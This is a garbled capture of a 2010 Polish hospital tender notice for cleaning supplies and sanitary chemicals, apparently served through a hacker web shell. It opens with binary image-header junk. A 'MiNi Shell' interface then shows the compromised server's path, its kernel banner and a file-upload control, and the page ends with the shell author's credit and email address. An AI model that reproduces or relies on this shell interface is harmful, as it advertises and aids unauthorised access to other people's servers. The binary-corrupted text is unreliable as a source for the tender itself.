JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/133449-N-2010.html

<p class="kh_header"><b>Ciechocinek: Środki czystości</b><br>
<b>Numer ogłoszenia: 133449 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 22 Wojskowy Szpital Uzdrowiskowo-Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5, 87-720 Ciechocinek, woj. kujawsko-pomorskie, tel. 054 28 332 11, faks 054 283 3211 w. 3202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.22wszur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Środki czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest sukcesywna dostawa środków czystości  i sprzętu gospodarczego wyszczególnionych w zał. nr 2 do specyfikacji:  LP	NAZWA MATERIAŁU	ilość	jm 1	szczotka ryżowa na kij - wkręcana PCV 260/45dł.wł 2cm	40	szt 2	szczotka ryżowa ręczna  PCV z rączką			50	szt 3	szczotka uliczna - 500mm drewno				10	szt 4	szczotka do zamiatania drewniana wkr.			40	szt 5	trzonki do szczotek dr. wkręcane				50	szt 6	szczotka zmiotka + szufelka PCV				40	kpl 7	szczotka do butelek - duża					30	szt 8	szczotka klozetowa z podstawką PCV			95	kpl 9	ściągaczka do mycia szyb -z trzon. regul. 2,5m		25	szt 10	komplet uniwersalny(myjka ze ściągaczką) do mycia szyb	20	szt 11	stelaż do MOP-ów  40cm na kieszenie			20	szt 12	kij aluminiowy do MOP-ów płaskich			25	szt 13	komplet MOP (wiadro+mop sznurkowy z trzon.)zw		12	kpl 14	komplet MOPz mikrofibry(stelarz i kij teleskopowy)		15	kpl 15	ściągaczka do wody z posadzki - 50cm			20	szt 	 			 PAKIET NR 2  CPV - 366 - SPRZĘT GOSPODARCZY PCV			  1	rękawice lateksowe(M i S)				35000	szt 2	rękawice winylowe (M i S)				150	szt 3	rękawice gumowe - gospodarcze				300	par 4	kosz na śmieci plastikowy z pokrywą 30l			40	szt 5	gąbka do mycia naczyń- duża z padem ścier.		700	szt 6	druciki do mycia naczyń ( 3 szt.)				100	op 7	mata łazienkowa - szerokości 70cm typu Simplex gr.5mm	120	mb 8	zasłona prysznica wodoodporna gruba 140x200 mat. pow.	65	szt 9	końcówka MOP -sznurkowa cięta średnia wkr.		120	szt 10	kubek do napoi gorących- plastikowe			11000	szt 11	kubek do napoi zimnych - plastikowe			17000	szt 12	miska plastikowa - śred. 500mm				30	szt 13	rozpylacz ręczny do płynów  z regulowaną koń. 0,5l	40	szt 14	wiadro plastikowe 10l					25	szt 15	kratka łazienkowa plastik					65	szt 16	wózek hotelowy trzy półkowy z koszem na brudną bieliznę o średnicy140 cm53x117x128,5 h (typ green hotel 900)+ serwis						1	szt 17	wózek do mycia  15l z wyciskarką i rączką prowadzącą +serwis	3	szt 18	wózek na brudną bieliznę 2 kosze w zestawie +serwis	3	kpl 	 		 PAKIET NR 3 CPV - 366 -SPRZĘT GOSPODARCZY PCV			  1	worki do śmieci 35l o gr 0,025mm LDPE  nieb wyt.do 20kg		21000	szt 2	worki do śmieci 35l o gr 0,08mm LDPE czerw. wyt.do 22kg		1200	szt 3	worki do śmieci 120l o gr.0,08mm HDPE czerw. 			200	szt 4	worki do śmieci 120l o gr.0,035mm HDPE nieb wyt. do 26kg		6000	szt 5	worki do śmieci 240l o gr 0,04mm LDPE nieb wyt do 30kg		3500	szt 6	worki do śmieci 60l o gr 0,03mm LDPE nieb wyt.do 22kg		5500	szt 7	worki do śmieci 60l o gr 0,03mm LDPE czer. wyt.do 22kg		1000	szt 8	worki do śmieci 160l o gr.0,04mm LDPE nieb wyt.do 28kg		4000	szt 9	worki do sur.wtur. 160l o gr.0,08mm niebieskie 800/1100		300	szt 10	worki do sur.wtur. 160l o gr.0,08mm żółty 800/1100			300	szt 11	worki do sur.wtur. 160l 0 gr.0,1mm zielony 800/1100		300	szt 12	worki do sur. Wtur. 60l o gr.0,08 niebieskie				50	szt 13	worki do sur.wtur. 60l o gr.0,08 zółty				50	szt 14	worki do sur. wtur. 60l o gr.0,1 zielony				50	szt 	 			 PAKIET NR 4 - CPV - 212 -  ARTYKUŁY PAPIERNICZE			  1	papier toaletowy-30 mb na rolce mak. jednowarst.			24000	szt 2	papier toaletowy miękki dwuwarstwowy-celul.- 30mb		6100	szt 3	ręczniki papierowe Z-Z ziel. makul.a  200				2200	szt 4	ręcznik papierowy na roli biały 2rolx48list.)kuch.			250	op 5	ręcznik z celulozy do solarium- czyściwo nie pylący			10	op 6	worki do odkurzaczy - zelmer cobra typ 20006B00E			150	szt 7	filtry do odkurzaczy - zelmer					50	szt 8	worki do odkurzaczy - lavor Sahara typ P 820299			150	szt 9	filtry do odkurzaczy - laver					30	szt 10	worki do odkurzaczy Dry Ufo Eko					120	szt 11	worki do odkurzaczy Numatic typ NVH 180			50	szt 12	worki do odkurzacza Cleanfix typ RS05 				50	szt 13	worki do odkurzacza Elektrolux Traxio typ Z6020			25	szt 14	worki do odkurzacza Elektrostar Starmix typ IS			25	szt 15	worki do odkurzacza Elektrostar Starmix typ GS			40	szt 16	worki do odkurzaczy typu Profi Europe				120	szt 	 			 PAKIET NR 5 - CPV 245 -  CHEMIA GOSPODARCZA			  1	płyn dezynfekujący -typu domestos 0,5l				450	szt 2	mleczko typu cif 0,700l						700	szt 3	płyn dezynfekujący typu  Forte 5l				615	l 4	płyn na  kamień rdzę do wc w płynie 0,5l typu tytan			600	szt 5	płyn na kamień i rdzę, plastik stal nierdzewna 0,5l typu cylit		700	szt 6	mydło w płynie - różne zapachy (5l)				420	l 7	płyn do mycia płytek, holi, klatek sch.typu Floor 0,5l		300	l 8	dezodorant do mycia mebli 0,250ml typu pronto			130	szt 9	dezodorant do pomieszczeń(zapach) Powiew 5l			580	l 10	elektroniczny odświeżacz powietrza				10	szt 11	wkłady zapachowe do ww odświeżacz				100	szt 12	płyn do mycia szyb i luster typu Window 0,750l			60	szt 13	płyn do mycia szyb i luster typu Window 5l			150	l 14	płyn do prania dywanów typu  Wanich 0,5l			35	szt 15	proszek do odkurzaczy piorących RM 760 op 10 kg			`3	szt 16	pasta do podłóg samopoł. antypośl.typu Sidolux 0,5l			120	szt 17	płyn do podłóg samopoł. -paneli typu Pronto 0,5l			200	szt 18	odkamieniacz do dzbanków kamix 0,15 kg				50	op 19	pasta do urządzeń sanitarnych typu Sama 0,250g			250	szt 20	płyn myjąco-dezynfekcyjny -typu  Goliat 5l			400	l 21	mydło antybakteryjne do mycia  rąk -1l				150	l 22	komplet pianka 200ml i ściereczka z mikrofibry do czyszczenia ekranów LCD	30kpl 23	płyn do mycia i konserwacji stali nierdzewnej op. 1,5l  typu Stainless Steel-20	szt 24	środek do nabłyszczania posadzek marmurowych i lastrykowych typu Swish Duration op 3,75l	16	szt 25	środek do usuwania warstw nabłyszczających typu Swish Strip op. 3,75l	11	szt 26	płyn do mycia naczyń 5l						4200	l 27	płyn do mycia naczyń w zmyw.na bazie chloru do bardzo twardej wody typu neodisher op 25 kg								125	kg 28	płyn do mycia naczyń w zmyw.bez chlorowy do mycia szkła i sztućców typu nedisher op 12kg									120	kg 29	płyn płucząco - nabłyszczający do porcelany i szkła i stali nierdzewnej stosowany w zmywarkach gastronomicznych neodisher op.10l				220	l 30	środek myjąco-dezynfekcyjny dla gastronomi działaniu grzybobójczym i bakteriobójczym stosowany za pomocą urządzeń dozujących op.10l neoquat S	60	l 31	nabłyszczacz du urządzeń ze stali nierdzewnej stosowany w gastronomii	80	l 32	środek do czyszczenia gryla op 5l	50	l 33	płyn do mycia powierzchni roboczych - CAROFARM AKT	80	l 34	odkamieniacz do usuwania kamienia w zmywarkach kotł. typu remix op. 3l-180l 			 PAKIETPAKIET NR 6 - CPV 245 -CHEMIA GOSPODARCZA			  1	pasta BHP do rąk 0,5 kg				100	kg 2	krem do rąk z witaminami 75ml			536	szt 3	pasta do obuwia 40g - czarna			100	szt 4	pisuarka do łazienek- kostka			500	op 5	zapach do toalet - koszyczek			4000	szt 6	krążek koloryzujący do wc			3000	szt 7	zmywacz do podłog typu Sidolux 0,5l		300	szt 8	mydło toaletowe- 100g				900	szt 9	środek do udrażniania rur kanalizacyjnych 500g	130	szt 10	odświeżacz powietrza  typu bris			160	szt 11	odświeżacz powietrza typu PUR			90	szt 12	mydło hotelowe 2dkg				1800	szt 	 			 PAKIET NR 7 - CPV - 241- CHEMIA BASENOWA			   1	kwas siarkowy 37% - płynny roztwór		9000	l 2	podchloryn sodu do 16%chloru stabilizowany	9000	l 3	środek do czyszczenia plaży			320	l 4	środek  do czyszczenia linii wodnej		320	l 5	koagulant					1200	l 6	środek przeciw glonom				320	l 		 PAKIET NR 8 - CPV - 172 WYROBY WŁÓKIENNICZE		  1	ścierka do podłóg biała bawełna			500	szt 2	ścierka domowa (3szt)bawełna			550	op 3	końcówka MOP - sznurkowa średnia wkr.		100	szt 4	końcówka MOP - ścierki z kieszeniami 40cm	100	szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 17.20.00.00-4, 21.20.00.00-5, 24.10.00.00-5, 24.50.00.00-9, 36.60.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę -,że posiada ubezpieczenie od odpowiedzialności cywilnej  w zakresie prowadzonej działalności gospodarczej- opłacona polisa ubezpieczenia OC na kwotę minimum 150tys. zł lub opłacona  I sza lub kolejna  rata</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.22wszur.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 22 Wojskowy Szpital Uzdrowiskowo Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5 , 87-720 Ciechocinek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2010 godzina 09:00, miejsce: 22 Wojskowy Szpital Uzdrowiskowo Rehabilitacyjny SP ZOZ , ul. Wojska Polskiego 5 , 87-720 Ciechocinek , administracja szpitala , pokój nr 13 ( wyłącznie).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com